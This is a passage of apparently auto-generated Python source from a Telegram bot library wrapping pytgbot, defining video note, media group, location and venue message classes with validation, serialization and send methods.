from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
data = super(VideoNoteMessage, VideoNoteMessage).validate_array(array)
if isinstance(array.get('video_note'), InputFile):
data['video_note'] = InputFile.from_array(array.get('video_note'))
elif isinstance(array.get('video_note'), str):
data['video_note'] = u(array.get('video_note'))
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['duration'] = int(array.get('duration')) if array.get('duration') is not None else None
data['length'] = int(array.get('length')) if array.get('length') is not None else None
if array.get('thumb') is None:
data['thumb'] = None
elif isinstance(array.get('thumb'), InputFile):
data['thumb'] = InputFile.from_array(array.get('thumb'))
elif isinstance(array.get('thumb'), str):
data['thumb'] = u(array.get('thumb'))
else:
raise TypeError('Unknown type, must be one of InputFile, str or None.')
# end if
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
if array.get('reply_markup') is None:
data['reply_markup'] = None
elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ForceReply):
data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
# end if
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new VideoNoteMessage from a given dictionary.
:return: new VideoNoteMessage instance.
:rtype: VideoNoteMessage
"""
if not array: # None or {}
return None
# end if
data = VideoNoteMessage.validate_array(array)
return VideoNoteMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(videonotemessage_instance)`
"""
return "VideoNoteMessage(video_note={self.video_note!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, duration={self.duration!r}, length={self.length!r}, thumb={self.thumb!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(videonotemessage_instance)`
"""
return "VideoNoteMessage(video_note={self.video_note!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, duration={self.duration!r}, length={self.length!r}, thumb={self.thumb!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in videonotemessage_instance`
"""
return (
key in ["video_note", "receiver", "reply_id", "duration", "length", "thumb", "disable_notification", "allow_sending_without_reply", "reply_markup"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class VideoNoteMessage
class MediaGroupMessage(ReturnableMessageBase):
"""
Use this method to send a group of photos, videos, documents or audios as an album. Documents and audio files can be only grouped in an album with messages of the same type. On success, an array of Messages that were sent is returned.
https://core.telegram.org/bots/api#sendmediagroup
Parameters:
:param media: A JSON-serialized array describing messages to be sent, must include 2-10 items
:type media: list of pytgbot.api_types.sendable.input_media.InputMediaAudio | list of pytgbot.api_types.sendable.input_media.InputMediaDocument | list of pytgbot.api_types.sendable.input_media.InputMediaPhoto | list of pytgbot.api_types.sendable.input_media.InputMediaVideo
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param disable_notification: Sends messages silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
"""
def __init__(self, media, receiver=None, reply_id=DEFAULT_MESSAGE_ID, disable_notification=None, allow_sending_without_reply=None):
"""
Use this method to send a group of photos, videos, documents or audios as an album. Documents and audio files can be only grouped in an album with messages of the same type. On success, an array of Messages that were sent is returned.
https://core.telegram.org/bots/api#sendmediagroup
Parameters:
:param media: A JSON-serialized array describing messages to be sent, must include 2-10 items
:type media: list of pytgbot.api_types.sendable.input_media.InputMediaAudio | list of pytgbot.api_types.sendable.input_media.InputMediaDocument | list of pytgbot.api_types.sendable.input_media.InputMediaPhoto | list of pytgbot.api_types.sendable.input_media.InputMediaVideo
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param disable_notification: Sends messages silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
"""
super(MediaGroupMessage, self).__init__()
from pytgbot.api_types.sendable.input_media import InputMediaAudio
from pytgbot.api_types.sendable.input_media import InputMediaDocument
from pytgbot.api_types.sendable.input_media import InputMediaPhoto
from pytgbot.api_types.sendable.input_media import InputMediaVideo
assert_type_or_raise(media, list, list, list, list, parameter_name="media")
self.media = media
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_media_group(
media=self.media,
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
)
# end def send
def to_array(self):
"""
Serializes this MediaGroupMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.sendable.input_media import InputMediaAudio
from pytgbot.api_types.sendable.input_media import InputMediaDocument
from pytgbot.api_types.sendable.input_media import InputMediaPhoto
from pytgbot.api_types.sendable.input_media import InputMediaVideo
array = super(MediaGroupMessage, self).to_array()
if isinstance(self.media, InputMediaAudio):
array['media'] = PytgbotApiBot._as_array(self.media) # type list of InputMediaAudio | list of InputMediaDocument | list of InputMediaPhoto | list of InputMediaVideo
elif isinstance(self.media, InputMediaDocument):
array['media'] = PytgbotApiBot._as_array(self.media) # type list of InputMediaAudio | list of InputMediaDocument | list of InputMediaPhoto | list of InputMediaVideo
elif isinstance(self.media, InputMediaPhoto):
array['media'] = PytgbotApiBot._as_array(self.media) # type list of InputMediaAudio | list of InputMediaDocument | list of InputMediaPhoto | list of InputMediaVideo
elif isinstance(self.media, InputMediaVideo):
array['media'] = PytgbotApiBot._as_array(self.media) # type list of InputMediaAudio | list of InputMediaDocument | list of InputMediaPhoto | list of InputMediaVideo
else:
raise TypeError('Unknown type, must be one of InputMediaAudio, InputMediaDocument, InputMediaPhoto, InputMediaVideo.')
# end if
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the MediaGroupMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.sendable.input_media import InputMediaAudio
from pytgbot.api_types.sendable.input_media import InputMediaDocument
from pytgbot.api_types.sendable.input_media import InputMediaPhoto
from pytgbot.api_types.sendable.input_media import InputMediaVideo
data = super(MediaGroupMessage, MediaGroupMessage).validate_array(array)
if isinstance(array.get('media'), InputMediaAudio):
data['media'] = InputMediaAudio.from_array_list(array.get('media'), list_level=1)
elif isinstance(array.get('media'), InputMediaDocument):
data['media'] = InputMediaDocument.from_array_list(array.get('media'), list_level=1)
elif isinstance(array.get('media'), InputMediaPhoto):
data['media'] = InputMediaPhoto.from_array_list(array.get('media'), list_level=1)
elif isinstance(array.get('media'), InputMediaVideo):
data['media'] = InputMediaVideo.from_array_list(array.get('media'), list_level=1)
else:
raise TypeError('Unknown type, must be one of InputMediaAudio, InputMediaDocument, InputMediaPhoto, InputMediaVideo.')
# end if
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new MediaGroupMessage from a given dictionary.
:return: new MediaGroupMessage instance.
:rtype: MediaGroupMessage
"""
if not array: # None or {}
return None
# end if
data = MediaGroupMessage.validate_array(array)
return MediaGroupMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(mediagroupmessage_instance)`
"""
return "MediaGroupMessage(media={self.media!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(mediagroupmessage_instance)`
"""
return "MediaGroupMessage(media={self.media!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in mediagroupmessage_instance`
"""
return (
key in ["media", "receiver", "reply_id", "disable_notification", "allow_sending_without_reply"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class MediaGroupMessage
class LocationMessage(ReturnableMessageBase):
"""
Use this method to send point on the map. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendlocation
Parameters:
:param latitude: Latitude of the location
:type latitude: float
:param longitude: Longitude of the location
:type longitude: float
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param horizontal_accuracy: The radius of uncertainty for the location, measured in meters; 0-1500
:type horizontal_accuracy: float
:param live_period: Period in seconds for which the location will be updated (see Live Locations, should be between 60 and 86400.
:type live_period: int
:param heading: For live locations, a direction in which the user is moving, in degrees. Must be between 1 and 360 if specified.
:type heading: int
:param proximity_alert_radius: For live locations, a maximum distance for proximity alerts about approaching another chat member, in meters. Must be between 1 and 100000 if specified.
:type proximity_alert_radius: int
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, latitude, longitude, receiver=None, reply_id=DEFAULT_MESSAGE_ID, horizontal_accuracy=None, live_period=None, heading=None, proximity_alert_radius=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send point on the map. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendlocation
Parameters:
:param latitude: Latitude of the location
:type latitude: float
:param longitude: Longitude of the location
:type longitude: float
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param horizontal_accuracy: The radius of uncertainty for the location, measured in meters; 0-1500
:type horizontal_accuracy: float
:param live_period: Period in seconds for which the location will be updated (see Live Locations, should be between 60 and 86400.
:type live_period: int
:param heading: For live locations, a direction in which the user is moving, in degrees. Must be between 1 and 360 if specified.
:type heading: int
:param proximity_alert_radius: For live locations, a maximum distance for proximity alerts about approaching another chat member, in meters. Must be between 1 and 100000 if specified.
:type proximity_alert_radius: int
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
super(LocationMessage, self).__init__()
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
assert_type_or_raise(latitude, float, parameter_name="latitude")
self.latitude = latitude
assert_type_or_raise(longitude, float, parameter_name="longitude")
self.longitude = longitude
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(horizontal_accuracy, None, float, parameter_name="horizontal_accuracy")
self.horizontal_accuracy = horizontal_accuracy
assert_type_or_raise(live_period, None, int, parameter_name="live_period")
self.live_period = live_period
assert_type_or_raise(heading, None, int, parameter_name="heading")
self.heading = heading
assert_type_or_raise(proximity_alert_radius, None, int, parameter_name="proximity_alert_radius")
self.proximity_alert_radius = proximity_alert_radius
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_location(
latitude=self.latitude,
longitude=self.longitude,
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
horizontal_accuracy=self.horizontal_accuracy,
live_period=self.live_period,
heading=self.heading,
proximity_alert_radius=self.proximity_alert_radius,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this LocationMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
array = super(LocationMessage, self).to_array()
array['latitude'] = float(self.latitude) # type float
array['longitude'] = float(self.longitude) # type float
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['horizontal_accuracy'] = float(self.horizontal_accuracy) # type float
array['live_period'] = int(self.live_period) # type int
array['heading'] = int(self.heading) # type int
array['proximity_alert_radius'] = int(self.proximity_alert_radius) # type int
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
if isinstance(self.reply_markup, InlineKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardRemove):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardRemove
elif isinstance(self.reply_markup, ForceReply):
array['reply_markup'] = self.reply_markup.to_array() # type ForceReply
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
# end if
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the LocationMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
data = super(LocationMessage, LocationMessage).validate_array(array)
data['latitude'] = float(array.get('latitude'))
data['longitude'] = float(array.get('longitude'))
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['horizontal_accuracy'] = float(array.get('horizontal_accuracy')) if array.get('horizontal_accuracy') is not None else None
data['live_period'] = int(array.get('live_period')) if array.get('live_period') is not None else None
data['heading'] = int(array.get('heading')) if array.get('heading') is not None else None
data['proximity_alert_radius'] = int(array.get('proximity_alert_radius')) if array.get('proximity_alert_radius') is not None else None
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
if array.get('reply_markup') is None:
data['reply_markup'] = None
elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ForceReply):
data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
# end if
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new LocationMessage from a given dictionary.
:return: new LocationMessage instance.
:rtype: LocationMessage
"""
if not array: # None or {}
return None
# end if
data = LocationMessage.validate_array(array)
return LocationMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(locationmessage_instance)`
"""
return "LocationMessage(latitude={self.latitude!r}, longitude={self.longitude!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, horizontal_accuracy={self.horizontal_accuracy!r}, live_period={self.live_period!r}, heading={self.heading!r}, proximity_alert_radius={self.proximity_alert_radius!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(locationmessage_instance)`
"""
return "LocationMessage(latitude={self.latitude!r}, longitude={self.longitude!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, horizontal_accuracy={self.horizontal_accuracy!r}, live_period={self.live_period!r}, heading={self.heading!r}, proximity_alert_radius={self.proximity_alert_radius!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in locationmessage_instance`
"""
return (
key in ["latitude", "longitude", "receiver", "reply_id", "horizontal_accuracy", "live_period", "heading", "proximity_alert_radius", "disable_notification", "allow_sending_without_reply", "reply_markup"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class LocationMessage
class VenueMessage(ReturnableMessageBase):
"""
Use this method to send information about a venue. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendvenue
Parameters:
:param latitude: Latitude of the venue
:type latitude: float
:param longitude: Longitude of the venue
:type longitude: float
:param title: Name of the venue
:type title: str|unicode
:param address: Address of the venue
:type address: str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param foursquare_id: Foursquare identifier of the venue
:type foursquare_id: str|unicode
:param foursquare_type: Foursquare type of the venue, if known. (For example, "arts_entertainment/default", "arts_entertainment/aquarium" or "food/icecream".)
:type foursquare_type: str|unicode
:param google_place_id: Google Places identifier of the venue
:type google_place_id: str|unicode
:param google_place_type: Google Places type of the venue. (See supported types.)
:type google_place_type: str|unicode
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, latitude, longitude, title, address, receiver=None, reply_id=DEFAULT_MESSAGE_ID, foursquare_id=None, foursquare_type=None, google_place_id=None, google_place_type=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send information about a venue. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendvenue
Parameters:
:param latitude: Latitude of the venue
:type latitude: float
:param longitude: Longitude of the venue
:type longitude: float
:param title: Name of the venue
:type title: str|unicode
:param address: Address of the venue
:type address: str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param foursquare_id: Foursquare identifier of the venue
:type foursquare_id: str|unicode
:param foursquare_type: Foursquare type of the venue, if known. (For example, "arts_entertainment/default", "arts_entertainment/aquarium" or "food/icecream".)
:type foursquare_type: str|unicode
:param google_place_id: Google Places identifier of the venue
:type google_place_id: str|unicode
:param google_place_type: Google Places type of the venue. (See supported types.)
:type google_place_type: str|unicode
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
super(VenueMessage, self).__init__()
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
assert_type_or_raise(latitude, float, parameter_name="latitude")
self.latitude = latitude
assert_type_or_raise(longitude, float, parameter_name="longitude")
self.longitude = longitude
assert_type_or_raise(title, unicode_type, parameter_name="title")
self.title = title
assert_type_or_raise(address, unicode_type, parameter_name="address")
self.address = address
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(foursquare_id, None, unicode_type, parameter_name="foursquare_id")
self.foursquare_id = foursquare_id
assert_type_or_raise(foursquare_type, None, unicode_type, parameter_name="foursquare_type")
self.foursquare_type = foursquare_type
assert_type_or_raise(google_place_id, None, unicode_type, parameter_name="google_place_id")
self.google_place_id = google_place_id
assert_type_or_raise(google_place_type, None, unicode_type, parameter_name="google_place_type")
self.google_place_type = google_place_type
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_venue(
latitude=self.latitude,
longitude=self.longitude,
title=self.title,
address=self.address,
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
foursquare_id=self.foursquare_id,
foursquare_type=self.foursquare_type,
google_place_id=self.google_place_id,
google_place_type=self.google_place_type,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this VenueMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
